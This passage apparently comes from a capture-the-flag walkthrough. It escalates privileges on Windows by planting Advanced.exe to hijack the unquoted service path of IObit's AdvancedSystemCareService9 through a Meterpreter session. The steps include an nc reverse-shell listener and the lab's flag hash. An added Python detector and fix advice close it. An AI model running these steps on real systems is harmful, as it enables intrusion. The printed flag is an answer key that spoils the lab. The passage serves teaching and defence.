100777/rwxrwxrwx  116000   fil   2015-12-29 04:49:40 +0800  NoteIcon.exe
100666/rw-rw-rw-  48416    fil   2015-12-29 04:49:44 +0800  NtfsData.dll
100666/rw-rw-rw-  784160   fil   2016-07-21 00:16:04 +0800  OFCommon.dll
100777/rwxrwxrwx  918816   fil   2016-07-21 00:16:06 +0800  PPUninstaller.exe
100666/rw-rw-rw-  70432    fil   2015-12-29 04:49:52 +0800  PowerConfig.dll
100666/rw-rw-rw-  629536   fil   2015-12-29 04:49:58 +0800  ProductStatistics.dll
100777/rwxrwxrwx  1044256  fil   2016-07-28 02:24:26 +0800  QuickSettings.exe
100777/rwxrwxrwx  152352   fil   2015-12-29 04:50:18 +0800  ReProcess.exe
100777/rwxrwxrwx  719648   fil   2015-12-29 04:50:02 +0800  RealTimeProtector.exe
100777/rwxrwxrwx  2052896  fil   2016-05-10 04:22:08 +0800  Register.exe
100777/rwxrwxrwx  1094944  fil   2016-07-28 02:24:28 +0800  Reinforce.exe
100666/rw-rw-rw-  1406     fil   2019-09-26 23:18:14 +0800  Reinforce.log
100777/rwxrwxrwx  490272   fil   2016-01-05 05:44:00 +0800  Report.exe
100777/rwxrwxrwx  1723680  fil   2016-07-21 09:07:08 +0800  RescueCenter.exe
100777/rwxrwxrwx  1326504  fil   2015-12-26 03:55:20 +0800  SPInit.exe
100777/rwxrwxrwx  8383688  fil   2016-07-29 01:07:04 +0800  SPSetup.exe
100666/rw-rw-rw-  783136   fil   2015-12-29 04:45:54 +0800  SPUrlScanner.dll
100666/rw-rw-rw-  1293088  fil   2015-12-29 04:50:24 +0800  Scan.dll
100777/rwxrwxrwx  802592   fil   2016-04-27 05:00:24 +0800  ScreenShot.exe
100666/rw-rw-rw-  1024000  fil   2022-10-26 14:03:29 +0800  SecurityHoleScan.log
100777/rwxrwxrwx  1887520  fil   2016-07-21 00:16:18 +0800  SendBugReportNew.exe
100777/rwxrwxrwx  1720096  fil   2016-01-12 04:30:12 +0800  SoftUpdateTip.exe
100666/rw-rw-rw-  202      fil   2019-09-26 23:18:13 +0800  SpeedUp.log
100777/rwxrwxrwx  897824   fil   2015-12-29 04:50:46 +0800  StartupInfo.exe
100777/rwxrwxrwx  2630944  fil   2016-07-28 02:26:32 +0800  Suc11_RegistryCleaner.exe
100777/rwxrwxrwx  1179936  fil   2016-07-21 00:30:20 +0800  Suc12_DiskCleaner.exe
100777/rwxrwxrwx  561440   fil   2016-01-06 09:47:42 +0800  Suo10_SmartRAM.exe
100777/rwxrwxrwx  1767712  fil   2016-07-21 00:30:26 +0800  Suo11_InternetBooster.exe
100777/rwxrwxrwx  4190496  fil   2016-07-21 00:30:28 +0800  Suo12_StartupManager.exe
100777/rwxrwxrwx  1421088  fil   2016-05-07 00:50:38 +0800  Sur13_WinFix.exe
100666/rw-rw-rw-  82720    fil   2015-12-29 04:50:48 +0800  SysRest.dll
100777/rwxrwxrwx  607520   fil   2015-12-29 04:50:50 +0800  TaskHelper.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Toolbox_Language
100777/rwxrwxrwx  3360032  fil   2016-04-23 08:40:54 +0800  UninstallPromote.exe
040777/rwxrwxrwx  4096     dir   2019-09-27 16:32:33 +0800  Update
100666/rw-rw-rw-  8386     fil   2016-07-28 05:09:38 +0800  Update History.txt
100777/rwxrwxrwx  1355552  fil   2016-07-22 05:32:12 +0800  Wizard.exe
100666/rw-rw-rw-  1407264  fil   2015-12-29 04:49:04 +0800  cpuidsdk.dll
100666/rw-rw-rw-  72992    fil   2015-12-29 04:49:06 +0800  datastate.dll
100777/rwxrwxrwx  242464   fil   2015-12-29 04:49:08 +0800  delayLoad.exe
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  drivers
100666/rw-rw-rw-  5430     fil   2011-02-10 07:46:46 +0800  fav.ico
100666/rw-rw-rw-  190240   fil   2015-12-24 09:32:36 +0800  madbasic_.bpl
100666/rw-rw-rw-  57632    fil   2015-12-24 09:32:38 +0800  maddisAsm_.bpl
100666/rw-rw-rw-  355616   fil   2015-12-24 09:32:40 +0800  madexcept_.bpl
100777/rwxrwxrwx  1436448  fil   2015-12-29 04:50:10 +0800  repair task.exe
100666/rw-rw-rw-  1108256  fil   2015-12-24 09:32:44 +0800  rtl120.bpl
100666/rw-rw-rw-  227104   fil   2015-12-29 04:50:30 +0800  sdcore.dll
100666/rw-rw-rw-  117536   fil   2015-12-29 04:50:32 +0800  sdlib.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:45 +0800  skin
100777/rwxrwxrwx  623904   fil   2016-07-26 01:01:12 +0800  smBootTime.exe
100666/rw-rw-rw-  694192   fil   2015-12-29 04:50:44 +0800  sqlite3.dll
100666/rw-rw-rw-  338720   fil   2015-12-29 04:50:52 +0800  taskmgr.dll
100666/rw-rw-rw-  119304   fil   2019-09-26 23:17:45 +0800  unins000.dat
100777/rwxrwxrwx  1208608  fil   2019-09-26 23:17:36 +0800  unins000.exe
100666/rw-rw-rw-  22701    fil   2019-09-26 23:17:45 +0800  unins000.msg
100666/rw-rw-rw-  2008864  fil   2015-12-24 09:32:46 +0800  vcl120.bpl
100666/rw-rw-rw-  222496   fil   2015-12-24 09:32:48 +0800  vclx120.bpl
100666/rw-rw-rw-  899872   fil   2015-12-29 04:50:58 +0800  webres.dll
100666/rw-rw-rw-  580      fil   2015-10-11 05:33:18 +0800  winid.dat


meterpreter > upload ~/Advanced.exe
[*] uploading  : /home/zacarx/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/zacarx/Advanced.exe -> Advanced.exe
[*] uploaded   : /home/zacarx/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  5091616  fil   2016-08-17 02:03:56 +0800  ASC.exe
100777/rwxrwxrwx  691488   fil   2015-12-29 04:48:34 +0800  ASCDownload.exe
100666/rw-rw-rw-  166176   fil   2015-12-29 04:47:32 +0800  ASCExtMenu.dll
100666/rw-rw-rw-  187680   fil   2015-12-29 04:47:30 +0800  ASCExtMenu_64.dll
100777/rwxrwxrwx  574240   fil   2016-03-04 08:16:34 +0800  ASCInit.exe
100666/rw-rw-rw-  743      fil   2019-09-26 23:17:50 +0800  ASCInit.log
100777/rwxrwxrwx  452384   fil   2016-07-26 01:01:08 +0800  ASCService.exe
100666/rw-rw-rw-  104270   fil   2022-10-26 15:12:56 +0800  ASCService.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:49 +0800  ASCServiceLog
100777/rwxrwxrwx  2023712  fil   2016-07-28 02:24:22 +0800  ASCTray.exe
100777/rwxrwxrwx  555808   fil   2015-12-29 05:06:42 +0800  ASCUpgrade.exe
100777/rwxrwxrwx  2400528  fil   2019-09-26 23:18:22 +0800  ASCVER.exe
100777/rwxrwxrwx  599328   fil   2015-12-29 04:48:46 +0800  AUpdate.exe
100666/rw-rw-rw-  64800    fil   2015-12-29 04:48:24 +0800  About.dll
100777/rwxrwxrwx  310560   fil   2016-07-28 02:24:20 +0800  About.exe
100666/rw-rw-rw-  21506    fil   2019-09-26 23:18:14 +0800  ActionCenter2.log
100777/rwxrwxrwx  2254624  fil   2016-01-08 09:13:48 +0800  ActionCenterDownloader.exe
100777/rwxrwxrwx  15872    fil   2022-10-26 15:16:17 +0800  Advanced.exe
100777/rwxrwxrwx  1917728  fil   2016-04-30 02:12:38 +0800  AutoCare.exe
100777/rwxrwxrwx  191264   fil   2015-12-29 04:52:24 +0800  AutoReactivator.exe
100777/rwxrwxrwx  1194784  fil   2016-04-30 02:12:40 +0800  AutoSweep.exe
100777/rwxrwxrwx  1403680  fil   2016-07-21 00:15:38 +0800  AutoUpdate.exe
100666/rw-rw-rw-  18536    fil   2019-09-27 16:32:33 +0800  AutoUpdate.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:46 +0800  Backup
100777/rwxrwxrwx  1063200  fil   2016-03-08 02:14:22 +0800  BrowserCleaner.exe
100666/rw-rw-rw-  131872   fil   2016-07-21 00:15:42 +0800  CPUIDInterface.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:42 +0800  Config
100777/rwxrwxrwx  451872   fil   2015-12-29 04:49:22 +0800  DNSProtect.exe
100777/rwxrwxrwx  513528   fil   2016-04-13 04:10:24 +0800  Dashlane_Launcher.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:51 +0800  Database
100777/rwxrwxrwx  2172704  fil   2016-05-07 00:50:26 +0800  DefaultProgram.exe
100666/rw-rw-rw-  11220    fil   2016-02-23 02:18:02 +0800  DetectionEx.ini
100777/rwxrwxrwx  438560   fil   2016-01-12 04:30:04 +0800  DiskDefrag.exe
100666/rw-rw-rw-  607520   fil   2015-12-29 04:49:12 +0800  DiskMap.dll
100666/rw-rw-rw-  127776   fil   2016-07-21 00:15:44 +0800  DiskScan.dll
100777/rwxrwxrwx  72992    fil   2015-12-29 04:49:16 +0800  DiskScan.exe
100777/rwxrwxrwx  110368   fil   2016-01-12 09:54:36 +0800  Display.exe
100666/rw-rw-rw-  586      fil   2022-10-26 14:03:06 +0800  Display_log.txt
100666/rw-rw-rw-  14716    fil   2013-07-20 09:31:32 +0800  DownloadApplication.xml
100666/rw-rw-rw-  81539    fil   2016-01-08 05:10:46 +0800  EULA.rtf
100777/rwxrwxrwx  1221408  fil   2016-07-21 00:15:46 +0800  FeedBack.exe
100666/rw-rw-rw-  454432   fil   2015-12-29 05:06:54 +0800  FfSweep.dll
100777/rwxrwxrwx  4939536  fil   2019-09-26 23:18:20 +0800  FreeBigupgrade1211.exe
100777/rwxrwxrwx  1019680  fil   2015-12-29 05:10:30 +0800  Homepage.exe
100666/rw-rw-rw-  750880   fil   2016-01-21 09:23:28 +0800  HomepageSvc.dll
100666/rw-rw-rw-  387360   fil   2016-03-04 04:21:28 +0800  ICONPIN32.dll
100777/rwxrwxrwx  380192   fil   2016-03-04 04:21:30 +0800  ICONPIN32.exe
100666/rw-rw-rw-  614176   fil   2016-03-04 04:21:34 +0800  ICONPIN64.dll
100777/rwxrwxrwx  582944   fil   2016-03-04 04:21:36 +0800  ICONPIN64.exe
100777/rwxrwxrwx  9474336  fil   2016-07-09 05:42:24 +0800  IObitUninstaller.exe
100666/rw-rw-rw-  899872   fil   2016-07-21 00:15:50 +0800  InfoHelp.dll
100777/rwxrwxrwx  21280    fil   2016-03-10 07:56:44 +0800  Iobit_RefreshTaskBar.exe
100666/rw-rw-rw-  15       fil   2014-07-23 05:15:36 +0800  Lang.dat
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Language
040777/rwxrwxrwx  4096     dir   2019-09-26 23:18:19 +0800  LatestNews
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  LinkImages
100777/rwxrwxrwx  2960672  fil   2016-07-21 00:15:54 +0800  LiveUpdate.exe
100666/rw-rw-rw-  768      fil   2019-09-26 23:17:49 +0800  LiveUpdate.log
100777/rwxrwxrwx  667424   fil   2015-12-29 04:49:32 +0800  LocalLang.exe
100777/rwxrwxrwx  1530656  fil   2016-07-21 00:15:56 +0800  Monitor.exe
100777/rwxrwxrwx  533792   fil   2015-12-29 04:49:38 +0800  MonitorDisk.exe
100777/rwxrwxrwx  2111776  fil   2016-04-30 02:12:52 +0800  MyWin10.exe
100777/rwxrwxrwx  569632   fil   2016-07-23 01:20:00 +0800  Nfeatures.exe
100777/rwxrwxrwx  116000   fil   2015-12-29 04:49:40 +0800  NoteIcon.exe
100666/rw-rw-rw-  48416    fil   2015-12-29 04:49:44 +0800  NtfsData.dll
100666/rw-rw-rw-  784160   fil   2016-07-21 00:16:04 +0800  OFCommon.dll
100777/rwxrwxrwx  918816   fil   2016-07-21 00:16:06 +0800  PPUninstaller.exe
100666/rw-rw-rw-  70432    fil   2015-12-29 04:49:52 +0800  PowerConfig.dll
100666/rw-rw-rw-  629536   fil   2015-12-29 04:49:58 +0800  ProductStatistics.dll
100777/rwxrwxrwx  1044256  fil   2016-07-28 02:24:26 +0800  QuickSettings.exe
100777/rwxrwxrwx  152352   fil   2015-12-29 04:50:18 +0800  ReProcess.exe
100777/rwxrwxrwx  719648   fil   2015-12-29 04:50:02 +0800  RealTimeProtector.exe
100777/rwxrwxrwx  2052896  fil   2016-05-10 04:22:08 +0800  Register.exe
100777/rwxrwxrwx  1094944  fil   2016-07-28 02:24:28 +0800  Reinforce.exe
100666/rw-rw-rw-  1406     fil   2019-09-26 23:18:14 +0800  Reinforce.log
100777/rwxrwxrwx  490272   fil   2016-01-05 05:44:00 +0800  Report.exe
100777/rwxrwxrwx  1723680  fil   2016-07-21 09:07:08 +0800  RescueCenter.exe
100777/rwxrwxrwx  1326504  fil   2015-12-26 03:55:20 +0800  SPInit.exe
100777/rwxrwxrwx  8383688  fil   2016-07-29 01:07:04 +0800  SPSetup.exe
100666/rw-rw-rw-  783136   fil   2015-12-29 04:45:54 +0800  SPUrlScanner.dll
100666/rw-rw-rw-  1293088  fil   2015-12-29 04:50:24 +0800  Scan.dll
100777/rwxrwxrwx  802592   fil   2016-04-27 05:00:24 +0800  ScreenShot.exe
100666/rw-rw-rw-  1024000  fil   2022-10-26 14:03:29 +0800  SecurityHoleScan.log
100777/rwxrwxrwx  1887520  fil   2016-07-21 00:16:18 +0800  SendBugReportNew.exe
100777/rwxrwxrwx  1720096  fil   2016-01-12 04:30:12 +0800  SoftUpdateTip.exe
100666/rw-rw-rw-  202      fil   2019-09-26 23:18:13 +0800  SpeedUp.log
100777/rwxrwxrwx  897824   fil   2015-12-29 04:50:46 +0800  StartupInfo.exe
100777/rwxrwxrwx  2630944  fil   2016-07-28 02:26:32 +0800  Suc11_RegistryCleaner.exe
100777/rwxrwxrwx  1179936  fil   2016-07-21 00:30:20 +0800  Suc12_DiskCleaner.exe
100777/rwxrwxrwx  561440   fil   2016-01-06 09:47:42 +0800  Suo10_SmartRAM.exe
100777/rwxrwxrwx  1767712  fil   2016-07-21 00:30:26 +0800  Suo11_InternetBooster.exe
100777/rwxrwxrwx  4190496  fil   2016-07-21 00:30:28 +0800  Suo12_StartupManager.exe
100777/rwxrwxrwx  1421088  fil   2016-05-07 00:50:38 +0800  Sur13_WinFix.exe
100666/rw-rw-rw-  82720    fil   2015-12-29 04:50:48 +0800  SysRest.dll
100777/rwxrwxrwx  607520   fil   2015-12-29 04:50:50 +0800  TaskHelper.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Toolbox_Language
100777/rwxrwxrwx  3360032  fil   2016-04-23 08:40:54 +0800  UninstallPromote.exe
040777/rwxrwxrwx  4096     dir   2019-09-27 16:32:33 +0800  Update
100666/rw-rw-rw-  8386     fil   2016-07-28 05:09:38 +0800  Update History.txt
100777/rwxrwxrwx  1355552  fil   2016-07-22 05:32:12 +0800  Wizard.exe
100666/rw-rw-rw-  1407264  fil   2015-12-29 04:49:04 +0800  cpuidsdk.dll
100666/rw-rw-rw-  72992    fil   2015-12-29 04:49:06 +0800  datastate.dll
100777/rwxrwxrwx  242464   fil   2015-12-29 04:49:08 +0800  delayLoad.exe
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  drivers
100666/rw-rw-rw-  5430     fil   2011-02-10 07:46:46 +0800  fav.ico
100666/rw-rw-rw-  190240   fil   2015-12-24 09:32:36 +0800  madbasic_.bpl
100666/rw-rw-rw-  57632    fil   2015-12-24 09:32:38 +0800  maddisAsm_.bpl
100666/rw-rw-rw-  355616   fil   2015-12-24 09:32:40 +0800  madexcept_.bpl
100777/rwxrwxrwx  1436448  fil   2015-12-29 04:50:10 +0800  repair task.exe
100666/rw-rw-rw-  1108256  fil   2015-12-24 09:32:44 +0800  rtl120.bpl
100666/rw-rw-rw-  227104   fil   2015-12-29 04:50:30 +0800  sdcore.dll
100666/rw-rw-rw-  117536   fil   2015-12-29 04:50:32 +0800  sdlib.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:45 +0800  skin
100777/rwxrwxrwx  623904   fil   2016-07-26 01:01:12 +0800  smBootTime.exe
100666/rw-rw-rw-  694192   fil   2015-12-29 04:50:44 +0800  sqlite3.dll
100666/rw-rw-rw-  338720   fil   2015-12-29 04:50:52 +0800  taskmgr.dll
100666/rw-rw-rw-  119304   fil   2019-09-26 23:17:45 +0800  unins000.dat
100777/rwxrwxrwx  1208608  fil   2019-09-26 23:17:36 +0800  unins000.exe
100666/rw-rw-rw-  22701    fil   2019-09-26 23:17:45 +0800  unins000.msg
100666/rw-rw-rw-  2008864  fil   2015-12-24 09:32:46 +0800  vcl120.bpl
100666/rw-rw-rw-  222496   fil   2015-12-24 09:32:48 +0800  vclx120.bpl
100666/rw-rw-rw-  899872   fil   2015-12-29 04:50:58 +0800  webres.dll
100666/rw-rw-rw-  580      fil   2015-10-11 05:33:18 +0800  winid.dat


meterpreter > shell
Process 2712 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1056:

An instance of the service is already running.

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9     
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

The first `sc start` above fails with error 1056 because the service is still running, so it has to be stopped first. Before starting it again, set up a listener on the attacking machine on the port the uploaded Advanced.exe will call back to:

nc -lnvp 4443

Then start the service:

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2384
        FLAGS              : 

The service's image path is unquoted, and Windows resolves such a path token by token: `C:\Program Files (x86)\IObit\Advanced.exe` is tried before `C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe`, which is why the payload is named Advanced.exe and why it only works from the IObit directory itself. When the service starts, our binary runs in place of ASCService.exe with the service's privileges rather than our own (what the original calls "root"; on Windows this is the service account, here enough to read the Administrator desktop). The START_PENDING state shown above is expected: the payload is not a real service binary, so the service control manager will terminate it once the start timeout expires. Catch the callback on the listener and migrate, or spawn a second process, if you need the access to persist. From the new shell:

C:\Users\Administrator\Desktop>type root.txt     
type root.txt
9af5f314f57607c00fd09803a587db80
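The privilege escalation above works because of how the Windows service control manager interprets an unquoted ImagePath that contains spaces. The following is an added example written for this walkthrough (not code from the original page, from IObit, or from the TryHackMe room): it models that resolution order, shows that `C:\Program Files (x86)\IObit\Advanced.exe` is tried before the real ASCService.exe, and flags which of those candidates an attacker could plant given the directories they can write to. The service records and the writable-directory set are constructed sample data; that the IObit folder is user-writable is an assumption of the demo, not something the script checks.

```python
"""Why dropping `Advanced.exe` next to the `Advanced SystemCare` folder hijacks
AdvancedSystemCareService9: a model of how the Windows service control manager
resolves an unquoted ImagePath.

Added example for this walkthrough, not code from the original page or from
IObit. The service records and the writable-directory set below are
constructed sample data (shaped like `sc qc` / Win32_Service name + PathName
pairs); the IObit folder being user-writable is an assumption of the demo.
"""
from __future__ import annotations

import ntpath


def image_path_candidates(image_path: str) -> list[str]:
    """Executables Windows tries, in order, when starting a service with this path.

    A double-quoted path is unambiguous: only that file is tried. An unquoted
    path is split at every space and each prefix is tried as an executable
    (".exe" is appended when the prefix has no extension). We stop at the
    prefix that names the real binary, since that file exists and wins the
    search; any tokens after it are arguments.
    """
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return [path[1:end] if end != -1 else path[1:]]

    tokens = path.split(" ")
    candidates: list[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        _, ext = ntpath.splitext(prefix)
        candidates.append(prefix + ".exe" if not ext else prefix)
        if ext.lower() == ".exe":
            break
    return candidates


def _norm(directory: str) -> str:
    """Case-insensitive directory comparison key (NTFS is case-insensitive)."""
    return directory.lower().rstrip("\\")


def hijack_points(image_path: str, writable_dirs: set[str]) -> list[str]:
    """Candidates tried *before* the real binary whose directory we can write to.

    Each one is a file a low-privileged user could create to run code as the
    service account the next time the service starts.
    """
    candidates = image_path_candidates(image_path)
    writable = {_norm(d) for d in writable_dirs}
    return [c for c in candidates[:-1] if _norm(ntpath.dirname(c)) in writable]


def find_unquoted_services(services, writable_dirs: set[str]) -> dict[str, list[str]]:
    """Map service name -> hijack points, for every service that has at least one."""
    findings: dict[str, list[str]] = {}
    for name, path in services:
        points = hijack_points(path, writable_dirs)
        if points:
            findings[name] = points
    return findings


# Constructed sample records (name, PathName). The first is the real path of
# the service abused above; the other two are made up to show safe cases.
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),                    # no spaces: safe
    ("GoodVendorSvc", r'"C:\Program Files\Good Vendor\svc.exe" -run'),  # quoted: safe
]

# Assumption for the demo: the compromised user can create files in the IObit
# directory but not in C:\ itself (so C:\Program.exe is not an option).
WRITABLE_DIRS = {r"C:\Program Files (x86)\IObit"}


if __name__ == "__main__":
    for name, path in SAMPLE_SERVICES:
        print(name)
        for candidate in image_path_candidates(path):
            print("  tries:", candidate)
    print("exploitable:", find_unquoted_services(SAMPLE_SERVICES, WRITABLE_DIRS))
```

On a live host the same check is done with `wmic service get name,pathname` (or `Get-CimInstance Win32_Service` in PowerShell) followed by `icacls` on each candidate directory. The fix is to quote the path, for example `sc config AdvancedSystemCareService9 binPath= "\"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe\""`, and to remove write access for ordinary users on the vendor directory; either change alone closes this particular hijack, but only the ACL change stops the same directory from being abused by DLL planting.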